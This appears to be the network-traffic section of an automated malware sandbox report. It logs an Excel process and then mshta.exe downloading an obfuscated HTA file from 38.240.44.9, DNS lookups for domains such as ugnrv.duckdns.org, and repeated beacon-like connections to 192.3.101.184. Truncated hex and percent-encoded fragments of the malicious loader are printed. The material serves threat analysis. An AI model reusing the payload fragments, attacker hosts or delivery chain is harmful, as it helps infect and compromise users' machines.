                                                                                                                                                                                              Oct 8, 2024 15:37:52.900068998 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900080919 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900094032 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900101900 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900104046 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900116920 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900131941 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900151014 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900646925 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900659084 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900667906 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900680065 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900686979 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900693893 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900707006 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900713921 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900718927 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900731087 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900738001 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900742054 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900753021 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900763035 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900763988 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900775909 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900779963 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900788069 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900804996 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900805950 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900835991 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900851011 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.900868893 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.902849913 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.976594925 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:38:15.407434940 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:38:15.409102917 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:38:15.414227009 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:38:45.432219028 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:38:45.434340954 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:38:45.440536022 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:38:45.803138971 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                              Oct 8, 2024 15:38:46.045938969 CEST8049175178.237.33.50192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:39:15.474585056 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:39:15.476008892 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:39:15.481074095 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:39:45.507186890 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:39:45.512590885 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:39:45.517621994 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:40:15.655448914 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:40:15.656802893 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:40:15.663352013 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Oct 8, 2024 15:37:09.362530947 CEST5456253192.168.2.228.8.8.8
                                                                                                                                                                                              Oct 8, 2024 15:37:09.374099016 CEST53545628.8.8.8192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:11.969165087 CEST5291753192.168.2.228.8.8.8
                                                                                                                                                                                              Oct 8, 2024 15:37:11.981760979 CEST53529178.8.8.8192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:27.522309065 CEST6275153192.168.2.228.8.8.8
                                                                                                                                                                                              Oct 8, 2024 15:37:27.534295082 CEST53627518.8.8.8192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:31.445318937 CEST5789353192.168.2.228.8.8.8
                                                                                                                                                                                              Oct 8, 2024 15:37:31.460506916 CEST53578938.8.8.8192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:37.858289957 CEST5482153192.168.2.228.8.8.8
                                                                                                                                                                                              Oct 8, 2024 15:37:37.955821991 CEST53548218.8.8.8192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:39.318964958 CEST5471953192.168.2.228.8.8.8
                                                                                                                                                                                              Oct 8, 2024 15:37:39.328641891 CEST53547198.8.8.8192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:44.247421980 CEST4988153192.168.2.228.8.8.8
                                                                                                                                                                                              Oct 8, 2024 15:37:44.258250952 CEST53498818.8.8.8192.168.2.22
                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                              Oct 8, 2024 15:37:09.362530947 CEST192.168.2.228.8.8.80xff04Standard query (0)wrath.meA (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:11.969165087 CEST192.168.2.228.8.8.80xf9ffStandard query (0)wrath.meA (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:27.522309065 CEST192.168.2.228.8.8.80xd446Standard query (0)ia600102.us.archive.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:31.445318937 CEST192.168.2.228.8.8.80x69ccStandard query (0)wrath.meA (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:37.858289957 CEST192.168.2.228.8.8.80xf832Standard query (0)ugnrv.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:39.318964958 CEST192.168.2.228.8.8.80x8149Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:44.247421980 CEST192.168.2.228.8.8.80xc94bStandard query (0)ia600102.us.archive.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                              Oct 8, 2024 15:37:09.374099016 CEST8.8.8.8192.168.2.220xff04No error (0)wrath.me188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:09.374099016 CEST8.8.8.8192.168.2.220xff04No error (0)wrath.me188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:11.981760979 CEST8.8.8.8192.168.2.220xf9ffNo error (0)wrath.me188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:11.981760979 CEST8.8.8.8192.168.2.220xf9ffNo error (0)wrath.me188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:27.534295082 CEST8.8.8.8192.168.2.220xd446No error (0)ia600102.us.archive.org207.241.227.242A (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:31.460506916 CEST8.8.8.8192.168.2.220x69ccNo error (0)wrath.me188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:31.460506916 CEST8.8.8.8192.168.2.220x69ccNo error (0)wrath.me188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:37.955821991 CEST8.8.8.8192.168.2.220xf832No error (0)ugnrv.duckdns.org192.3.101.184A (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:39.328641891 CEST8.8.8.8192.168.2.220x8149No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                              Oct 8, 2024 15:37:44.258250952 CEST8.8.8.8192.168.2.220xc94bNo error (0)ia600102.us.archive.org207.241.227.242A (IP address)IN (0x0001)false
                                                                                                                                                                                              • wrath.me
                                                                                                                                                                                              • ia600102.us.archive.org
                                                                                                                                                                                              • 38.240.44.9
                                                                                                                                                                                              • geoplugin.net
                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              0192.168.2.224916238.240.44.9803564C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Oct 8, 2024 15:37:10.507565022 CEST351OUTGET /590/un/verynicepersonupdation.hta HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                              Host: 38.240.44.9
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Oct 8, 2024 15:37:11.380336046 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:14 GMT
                                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 08:22:57 GMT
                                                                                                                                                                                              ETag: "1d7be-623f2d847e3f2"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Content-Length: 120766
                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: application/hta
                                                                                                                                                                                              Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: <script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CsCRIPt%252520type%25253D%252522TEXT/VBscRIpT%252522%25253E%25250Adim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                                                                                                              Oct 8, 2024 15:37:11.380357027 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                                                                                                              Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                                                                                                              Oct 8, 2024 15:37:11.380376101 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                                                                                                                              Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                                                                                                                              Oct 8, 2024 15:37:11.380397081 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                                                                                                                              Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                                                                                                                              Oct 8, 2024 15:37:11.380413055 CEST896INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                                                                              Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                                              Oct 8, 2024 15:37:11.578912020 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                                                                              Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579045057 CEST224INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                                                                                                              Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579056025 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                                                                                                              Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509rQqidGfxumKEzLoeGLggbpAXMKRxbOcTRmkdDyxHdzgKVegDYqFUckPZbKkufQZLmlEMZPGIAJZNOvsjkxLanQoIGdHsuBlaDLNsT
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579077005 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                                                                                                                              Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579088926 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 33 41 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                                                                                                                              Data Ascii: 509%252509%252509%252509%252509%252509%25253A%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                                                                                                                              Oct 8, 2024 15:37:11.579108953 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                                                                              Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              1192.168.2.224916438.240.44.9803852C:\Windows\System32\mshta.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Oct 8, 2024 15:37:13.091228962 CEST428OUTGET /590/un/verynicepersonupdation.hta HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Accept-Language: fr-FR
                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                              Range: bytes=6756-
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Host: 38.240.44.9
                                                                                                                                                                                              If-Range: "1d7be-623f2d847e3f2"
                                                                                                                                                                                              Oct 8, 2024 15:37:13.956185102 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:16 GMT
                                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 08:22:57 GMT
                                                                                                                                                                                              ETag: "1d7be-623f2d847e3f2"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Content-Length: 114010
                                                                                                                                                                                              Content-Range: bytes 6756-120765/120766
                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: application/hta
                                                                                                                                                                                              Data Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509rQqidGfxumKEzLoeGLggbpAXMKRxbOcTRmkdDyxHdzgKVegDYqFUckPZbKkufQZLmlEMZPGIAJZNOvsjkxLanQoIGdHsuBlaDLNsTbtiNLEVFfNDsbMIjAMHBMxyuqyuRFYcMCzPRAiqWDetzXYXtKYFOGUWIDECePBZgNNmOXbgolhnGhIerOLjvFnULKpfskJrCeYgFXxAjwLUPzgjFjQbyFQyefuLIM%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                                                                                                                                              Oct 8, 2024 15:37:13.956204891 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                                                                                                                              Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                                                                                                                              Oct 8, 2024 15:37:13.956217051 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                                                                              Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                                              Oct 8, 2024 15:37:13.956501961 CEST672INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                                                                                                              Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                                                                                                              Oct 8, 2024 15:37:13.956513882 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                                                                                                              Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                                                                                                              Oct 8, 2024 15:37:13.956523895 CEST224INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                                              Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                                              Oct 8, 2024 15:37:14.155888081 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                                              Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                                                                                                                                              Oct 8, 2024 15:37:14.155901909 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                                                                                                                              Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
